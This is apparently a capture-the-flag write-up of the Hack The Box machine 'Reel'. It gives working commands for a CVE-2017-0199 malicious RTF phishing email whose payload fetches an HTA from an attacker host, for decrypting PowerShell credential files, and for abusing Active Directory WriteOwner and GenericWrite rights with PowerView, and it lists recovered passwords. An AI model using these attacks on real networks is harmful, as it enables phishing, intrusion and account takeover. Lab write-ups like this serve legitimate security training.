⇒ Reel is an hard active directory machine created by egre55 that teaches us :
- Decrypting files encrypted with PS.Credentials.
- Abusing WriteOwner to give ourselves reset password perms then resetting pass
- Abusing GenericWrite to a group
⇒ We are able to authenticate in ftp as Anonymous user and we find the following files :
- readme.txt has a note about sending email with rtf documents attached
- Applocker.docx has hash rules that block certain file types
- Running exiftool on Windows Event Forwarding.docx we find email address
CVE-2017-0199 [ malicious RTF ]
⇒ So we’ll be sending email to email@example.com with the malicious rtf file attached that calls to our hta file which we will be creating using metasploit.
- Creating hta payload
use windows/misc/hta_server set lhost tun0 set srvhost tun0 set lport 4444 run
- Next we’ll be creating the malicious rtf file :
python cve-2017-0199_toolkit.py -M gen -t rtf -w jake.rtf -u 'http://10.10.14.8:80/5TktJBtnZ.hta'
- Next we’ll be sending the mail to firstname.lastname@example.org using swaks as we saw smtp port was open :
swaks --server 10.10.10.77 --from email@example.com --to firstname.lastname@example.org --header "Please click" --body "Here is the document you requested http://10.10.14.8:80/5TktJBtnZ.hta" --attach jake.rtf
Privilege Escalation to tom
⇒ There is cred.xml that is encrypted with PS.Credentials :
- We decoded it and got password for tom user :
$credential = Import-CliXml -Path C:\Users\nico\Desktop\cred.xml $credential.GetNetworkCredential().Password
Tom : 1ts-mag1c!!!
⇒ We ssh’ed in as tom using the credentials :
Privilege Escalation to claire
⇒ On tom desktop we find interesting files and a note talking about no attack paths but he only performed short path query. There’s also acls.csv file in Ingestors folder which we can load in bloodhound and enumerate
⇒ Loaded it up in bloodhound and found out that we have WriteOwner to claire user and claire user has GenericWrite to Backup_Admins group.
⇒ Abusing WriteOwner to make ourselves owner of claire and then add resetpassword rights to ourselves and change the password
# Making ourselves owner Set-DomainObjectOwner -Identity claire -OwnerIdentity tom # Giving ourselves reset password rights Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\claire -Rights ResetPassword # Resetting the password Set-DomainObjectOwner -Identity claire -OwnerIdentity tom Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom $newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force Set-DomainUserPassword -Identity claire -AccountPassword $newpass
⇒ Then we just ssh’ed in as claire :
Privilege Escalation to Administrator
⇒ As we previously saw claire user has GenericWrite to backup_admins group so lets add our user to the group :
net group backup_admins claire /add
- Next we go back to tom and run the reset password commands again and ssh in as claire
⇒ Now we are able to read files in Administrator folder but we can’t still read the root flag. There’s an folder Backup Scripts which contain couple of powershell scripts. One of the script has administrator password :
administrator : Cr4ckMeIfYouC4n!
⇒ We ssh’ed in as administrator and grabbed the root flag